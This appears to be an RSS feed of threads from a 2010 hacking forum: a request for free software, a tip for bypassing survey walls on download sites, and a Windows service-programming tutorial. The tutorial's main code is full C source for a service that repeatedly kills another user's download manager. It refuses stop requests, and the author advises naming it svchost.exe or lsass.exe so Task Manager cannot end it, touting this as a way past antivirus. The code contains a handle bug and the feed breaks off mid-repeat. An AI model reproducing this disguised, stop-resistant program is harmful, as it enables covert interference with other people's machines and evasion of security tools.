<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[h4ck3r - Hacking &#x26; Security - All Forums]]></title>
		<link>http://h4ck3r.in/board/</link>
		<description><![CDATA[h4ck3r - Hacking &#x26; Security - http://h4ck3r.in/board]]></description>
		<pubDate>Wed, 08 Sep 2010 04:08:57 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[dowload x3 player]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1896</link>
			<pubDate>Mon, 06 Sep 2010 23:25:43 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1896</guid>
			<description><![CDATA[pls post the link to download free x3 player]]></description>
			<content:encoded><![CDATA[pls post the link to download free x3 player]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How to get around those Download sites where you have to do a survey.]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1895</link>
			<pubDate>Mon, 06 Sep 2010 17:54:48 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1895</guid>
			<description><![CDATA[OK idk where this goes and i don't have much stuff here so bare with me on this. Ive only done this for plunder. So if there's another on im sure you can figure it out. <img src="http://h4ck3r.in/board/images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<img src="http://i933.photobucket.com/albums/ad175/rahulrhl29/Capture-20.jpg" border="0" alt="[Image: Capture-20.jpg&#93;" /><br />
<br />
OK so first click view on the top of the internet browser or press CTRL+U<br />
<img src="http://i933.photobucket.com/albums/ad175/rahulrhl29/Capturecopy.jpg" border="0" alt="[Image: Capturecopy.jpg&#93;" /><br />
<br />
Now u press CTRL+F and you should know the name of the file if not just read it off plunder in my case its "VentServ.rar (0.10 mb)" and type it in the search box and press enter.<br />
<br />
<img src="http://i933.photobucket.com/albums/ad175/rahulrhl29/Capture1-5.jpg" border="0" alt="[Image: Capture1-5.jpg&#93;" /><br />
Now there's a link next to it.. don't click it. just copy it then paste it in your address bar. Tell me if you have any problems!:ROlL:]]></description>
			<content:encoded><![CDATA[OK idk where this goes and i don't have much stuff here so bare with me on this. Ive only done this for plunder. So if there's another on im sure you can figure it out. <img src="http://h4ck3r.in/board/images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<img src="http://i933.photobucket.com/albums/ad175/rahulrhl29/Capture-20.jpg" border="0" alt="[Image: Capture-20.jpg]" /><br />
<br />
OK so first click view on the top of the internet browser or press CTRL+U<br />
<img src="http://i933.photobucket.com/albums/ad175/rahulrhl29/Capturecopy.jpg" border="0" alt="[Image: Capturecopy.jpg]" /><br />
<br />
Now u press CTRL+F and you should know the name of the file if not just read it off plunder in my case its "VentServ.rar (0.10 mb)" and type it in the search box and press enter.<br />
<br />
<img src="http://i933.photobucket.com/albums/ad175/rahulrhl29/Capture1-5.jpg" border="0" alt="[Image: Capture1-5.jpg]" /><br />
Now there's a link next to it.. don't click it. just copy it then paste it in your address bar. Tell me if you have any problems!:ROlL:]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Windows System Service : A briefing]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1894</link>
			<pubDate>Mon, 06 Sep 2010 07:20:48 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1894</guid>
			<description><![CDATA[Hello all, i am baaack !! Sorry for my long absence, and quite a change in the forum too, well we all tends to change and its good to see this forum is improving. Anyway lets start. Yesterday i was reading a book about Linux Kernel Programming and the writer said a very interesting thing.. wanna hack linux for real ?? - learn kernel programming. That thing struck my mind, really if u get close to kernel or become a good device driver developer nearly all System is open to u...thats what brings me to this.. Windows Service Programming. Windows Services are some program which happens to (According to many, but i am not sure) communicate with kernels, this could be true as device drivers are Services as well. So if u can develop a System Service u can use it for any purpose..(not necesserily malicious <img src="http://h4ck3r.in/board/images/smilies/wink.gif" style="vertical-align: middle;" border="0" alt="Wink" title="Wink" />) and to great extent...<br />
First check out the services... <span style="font-weight: bold;">start &gt; run &gt; services.msc</span><br />
play with it for a while guyz. See u can start, stop, pause a service. Some service can be started at the startup too. A proper service program must interact with this manager (set its status pause when said to, or notify the manager its status etc... but we r not concerned with it that much for<br />
now).<br />
<br />
Lets start how we program one...?? Fortunately most of the Service Programs are console apps (except for interactive service programs). So fire up ur Ms Visual C++ for a console app.<br />
<br />
as usual we begin with main(), from here we call a function That is the Main function of the Service and the program must also have a CtrlHandler function that handles signals from the service control manager. so basically the skeleton of a single threaded service program is...<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>int main(int *argc, char *argv[&#93;){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//we prepare a table (array) of service here<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//yeah u can start multiple services but the array must end with null<br />
&nbsp;&nbsp;&nbsp;&nbsp;//the array is of type SERVICE_TABLE_ENTRY structure which has two members<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//name of the service - a string and pointer to the function we consider as ServiceMain()<br />
&nbsp;&nbsp;&nbsp;&nbsp;// service main must have access to argc and argv in windows sense (use DWORD, LPSTR for types)<br />
&nbsp;&nbsp;&nbsp;&nbsp;// u can give any name, if u don't understand pointer to function just get it for now that<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;// we are just placing the function name without brackets here<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// we call a dispatcher function to call the ServiceMain()<br />
&nbsp;&nbsp;&nbsp;&nbsp;// StartServiceCtrlDispatcher(service_table)<br />
&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;//the work of this func is done<br />
}<br />
<br />
void WINAPI ServiceMain(DWORD argc, LPSTR *argv){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//prepare a SERVICE_STATUS structure<br />
&nbsp;&nbsp;&nbsp;&nbsp;//we are preparing so set the dwCurrentState to SERVICE_START_PENDING<br />
&nbsp;&nbsp;&nbsp;&nbsp;//this is how u change status time to time accordingly..<br />
&nbsp;&nbsp;&nbsp;&nbsp;//to c what its member does check this <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//http://msdn.microsoft.com/en-us/library/ms685996%28VS.85%29.aspx<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;//register the ServiceSignalHandler<br />
&nbsp;&nbsp;&nbsp;&nbsp;// RegisterServiceCtrlHandler("ServiceName", SignalHandlerFunc) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// if needed initialize other data<br />
&nbsp;&nbsp;&nbsp;&nbsp;// if lengthy open anoter thread<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;//set the service_status to SERVICE_RUNNING<br />
&nbsp;&nbsp;&nbsp;&nbsp;//apply it by calling SetServiceStatus(handle2ServiceStatus, &amp;service_status) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// :D:D:D do ur job here :D:D:D<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// return ;<br />
}<br />
<br />
void WINAPI ServiceSignalHandler(DWORD signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//this is where u receive signal from service control manager<br />
&nbsp;&nbsp;&nbsp;&nbsp;//it handles those simultaneoussly just say what to do<br />
&nbsp;&nbsp;&nbsp;&nbsp;//switch(signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp; case&nbsp;&nbsp;SERVICE_CONTROL_PAUSE:<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;do something to make ur job pause and set the status via SetServiceStatus()<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;but do we care ??<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;//}<br />
}</code></div></div>
When u r comfortable with both Service Programming, and Multithreading u will be able to write Multithreaded service program in a blink of an eye :lolz:<br />
<br />
Now one more thing: u need to install ur service first, here is how u do it<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Install(){<br />
&nbsp;&nbsp;&nbsp;&nbsp;// Open serviceControlManager to get its handle<br />
&nbsp;&nbsp;&nbsp;&nbsp;// hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) ; <br />
&nbsp;&nbsp;&nbsp;&nbsp;// nulls are for default values and they are the best google it<br />
&nbsp;&nbsp;&nbsp;&nbsp;// Create service<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;// CreateService(hSCM, "ServiceName", "DisplayName", other params...) google them<br />
&nbsp;&nbsp;&nbsp;&nbsp;// Close the service handle<br />
&nbsp;&nbsp;&nbsp;&nbsp;// by the way no-6 param could be set to SERVICE_AUTO_START for startup start or<br />
&nbsp;&nbsp;&nbsp;&nbsp;// SERVICE_DEMAND_START&nbsp;&nbsp;-- just saying, thought important<br />
}</code></div></div>
U culd also uninstall the code is later provided, read it, understand it, type it then u r sure to get the hang of this.<br />
<br />
Hooh.... I barely covered any topic. But this topics are beyond a tut. You will have to google to learn. You should learn the following..<br />
1. Service Account system (Security)<br />
2. Query Service<br />
3. Configure a Service<br />
<br />
How can i get away with out giving an example ??? In our dept. lab some people eat high bandwidth by downloading with IDM, and others don't get the simplest browsing speed, so decided to make this cutie..<br />
<br />
It ignores the service managers stop requeset, and if renamed to (I mean compiled as) name like svchost.exe or lsass.exe or csrss.exe then the taskmanager won't kill them either. the installer is in the same program, run it like svchost -i to install, and svchost -u to <br />
uninstall.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>/*<br />
&nbsp;&nbsp;&nbsp;&nbsp;A Windows Service Program to kill IDM<br />
&nbsp;&nbsp;&nbsp;&nbsp;Rename the exe to something like svchost.exe or lsass.exe or csrss.exe <br />
&nbsp;&nbsp;&nbsp;&nbsp;or anything similiar to windows critical file name so the task manager fails to kill<br />
&nbsp;&nbsp;&nbsp;&nbsp;well at least in win xp<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;FileName: IDMKiller.cpp<br />
&nbsp;&nbsp;&nbsp;&nbsp;Author: dumb_terminal<br />
*/<br />
<br />
#define _WIN32_WINNT 0x0501<br />
<br />
//although not essential<br />
#pragma comment (lib, "advapi32.lib")<br />
<br />
#include &lt;stdio.h&gt;<br />
#include &lt;windows.h&gt;<br />
#include &lt;tlhelp32.h&gt;<br />
<br />
typedef PROCESSENTRY32 PROCESS ;<br />
<br />
void WINAPI ServiceMain(DWORD argc, LPSTR *argv) ;<br />
void WINAPI ServiceSignalHandler(DWORD signal) ;<br />
bool InstallService() ;<br />
bool UninstallService() ;<br />
<br />
SERVICE_STATUS SS ;<br />
SERVICE_STATUS_HANDLE hSS ;<br />
<br />
void main(int argc, char *argv[&#93;){<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (argc == 2){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (argv[1&#93;[1&#93; == 'i'){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (!InstallService())<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Error Installing Service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}else if (argv[1&#93;[1&#93; == 'u'){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (!UninstallService())<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Error Uninstalling Service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}else{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SERVICE_TABLE_ENTRY serviceTable[&#93; = {{ "IDMKiller", ServiceMain }, {NULL, NULL} } ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (!StartServiceCtrlDispatcher(serviceTable))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("StartServiceCtrlDispatcher() failed&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
}<br />
<br />
void WINAPI ServiceMain(DWORD argc, LPSTR *argv){<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwServiceType = SERVICE_WIN32 ;&nbsp;&nbsp;//could be SERVICE_ADAPTER or SERVICE_DRIVER <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//or SERVICE_INTERACTIVE_PROCESS<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCurrentState = SERVICE_START_PENDING ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwControlsAccepted = SERVICE_ACCEPT_STOP ; //we won't be stopping anyway :D<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwServiceSpecificExitCode = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwWaitHint = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwWin32ExitCode = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCheckPoint = 0 ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;hSS = RegisterServiceCtrlHandler("IDMKiller", ServiceSignalHandler) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hSS == (SERVICE_STATUS_HANDLE)0){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("RegisterServiceCtrlHandler() failed&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// here could be initialization but we don't need need any...:D<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCurrentState = SERVICE_RUNNING ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCheckPoint = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwWaitHint = 0 ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;SetServiceStatus(hSS, &amp;SS) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;//out IDMSearch and Kill<br />
&nbsp;&nbsp;&nbsp;&nbsp;while(1){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//we check at regular 5 second basis<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sleep(5000) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PROCESS proc ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HANDLE hSnap, hProcess ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Process32First(hProcess, &amp;proc) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;do{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (strstr(proc.szExeFile, "IDMan.exe")){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, proc.th32ProcessID) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;TerminateProcess(hProcess, 0) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}while (Process32Next(hSnap, &amp;proc)) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CloseHandle(hProcess) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
}<br />
<br />
void WINAPI ServiceSignalHandler(DWORD signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;switch(signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case SERVICE_CONTROL_PAUSE:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//ignore - we chose not to accept it anyway<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ; <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case SERVICE_CONTROL_CONTINUE:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//ignore - we chose not to accept it anyway<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case SERVICE_CONTROL_STOP:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//certainly not - we won't take any action if we are told to stop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;default:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
}<br />
<br />
bool InstallService(){<br />
&nbsp;&nbsp;&nbsp;&nbsp;char dir[255&#93; ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;HANDLE hSCM ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SC_HANDLE hService ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;LPCTSTR binPath = dir ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;GetCurrentDirectory(255, dir) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;strcat(dir, "&#92;&#92;IDMKiller.exe") ; //replace IDMKiller with something like svchost<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //to make it invincible to task manager<br />
&nbsp;&nbsp;&nbsp;&nbsp;hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hSCM == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Could not open Service Control Manager&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;hService = CreateService(hSCM, "IDMKiller", "IDMKiller", SERVICE_ALL_ACCESS, <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; binPath, NULL, NULL, NULL, NULL, NULL) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hService == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Couldn't get service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;CloseServiceHandle(hService) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;return true ;<br />
}<br />
<br />
bool UninstallService(){<br />
&nbsp;&nbsp;&nbsp;&nbsp;HANDLE hSCM;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SC_HANDLE hService;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hSCM == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Could not Open Service Control Manager&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;hService=OpenService(hSCM, "IDMKiller", SERVICE_ALL_ACCESS);<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hService == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Couldn't get service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;if(!DeleteService(hService)){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Couldn't Delete Service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;CloseServiceHandle(hService) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;return true;<br />
}</code></div></div>
Haven't tested that much, u guys test it on vista and 7 and plz in4m me, that way we all can learn.<br />
Guyz do u smell it, u have the tool to sneak past most (if not all) AntiViruses.<br />
But there are ways to sneak past it. U c the Service information are stored in the registry<br />
<span style="font-weight: bold;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[ServiceName&#93;\</span><br />
So u can beat those with Registry Operations. And the bad thing is u need to be privileged like admin to install it. But most people usually run as admin. I haven't tested it yet, find it hard to get some time nowadays.. u guys plz test and in4m me, (i heard there is a decent registry tut in this forum <img src="http://h4ck3r.in/board/images/smilies/wink.gif" style="vertical-align: middle;" border="0" alt="Wink" title="Wink" />).<br />
Ok guys bye for now, hope to be back soon, and sorry for this boaring tut. Hats off. Have a nice time]]></description>
			<content:encoded><![CDATA[Hello all, i am baaack !! Sorry for my long absence, and quite a change in the forum too, well we all tends to change and its good to see this forum is improving. Anyway lets start. Yesterday i was reading a book about Linux Kernel Programming and the writer said a very interesting thing.. wanna hack linux for real ?? - learn kernel programming. That thing struck my mind, really if u get close to kernel or become a good device driver developer nearly all System is open to u...thats what brings me to this.. Windows Service Programming. Windows Services are some program which happens to (According to many, but i am not sure) communicate with kernels, this could be true as device drivers are Services as well. So if u can develop a System Service u can use it for any purpose..(not necesserily malicious <img src="http://h4ck3r.in/board/images/smilies/wink.gif" style="vertical-align: middle;" border="0" alt="Wink" title="Wink" />) and to great extent...<br />
First check out the services... <span style="font-weight: bold;">start &gt; run &gt; services.msc</span><br />
play with it for a while guyz. See u can start, stop, pause a service. Some service can be started at the startup too. A proper service program must interact with this manager (set its status pause when said to, or notify the manager its status etc... but we r not concerned with it that much for<br />
now).<br />
<br />
Lets start how we program one...?? Fortunately most of the Service Programs are console apps (except for interactive service programs). So fire up ur Ms Visual C++ for a console app.<br />
<br />
as usual we begin with main(), from here we call a function That is the Main function of the Service and the program must also have a CtrlHandler function that handles signals from the service control manager. so basically the skeleton of a single threaded service program is...<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>int main(int *argc, char *argv[]){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//we prepare a table (array) of service here<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//yeah u can start multiple services but the array must end with null<br />
&nbsp;&nbsp;&nbsp;&nbsp;//the array is of type SERVICE_TABLE_ENTRY structure which has two members<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//name of the service - a string and pointer to the function we consider as ServiceMain()<br />
&nbsp;&nbsp;&nbsp;&nbsp;// service main must have access to argc and argv in windows sense (use DWORD, LPSTR for types)<br />
&nbsp;&nbsp;&nbsp;&nbsp;// u can give any name, if u don't understand pointer to function just get it for now that<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;// we are just placing the function name without brackets here<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// we call a dispatcher function to call the ServiceMain()<br />
&nbsp;&nbsp;&nbsp;&nbsp;// StartServiceCtrlDispatcher(service_table)<br />
&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;//the work of this func is done<br />
}<br />
<br />
void WINAPI ServiceMain(DWORD argc, LPSTR *argv){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//prepare a SERVICE_STATUS structure<br />
&nbsp;&nbsp;&nbsp;&nbsp;//we are preparing so set the dwCurrentState to SERVICE_START_PENDING<br />
&nbsp;&nbsp;&nbsp;&nbsp;//this is how u change status time to time accordingly..<br />
&nbsp;&nbsp;&nbsp;&nbsp;//to c what its member does check this <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//http://msdn.microsoft.com/en-us/library/ms685996%28VS.85%29.aspx<br />
<br />
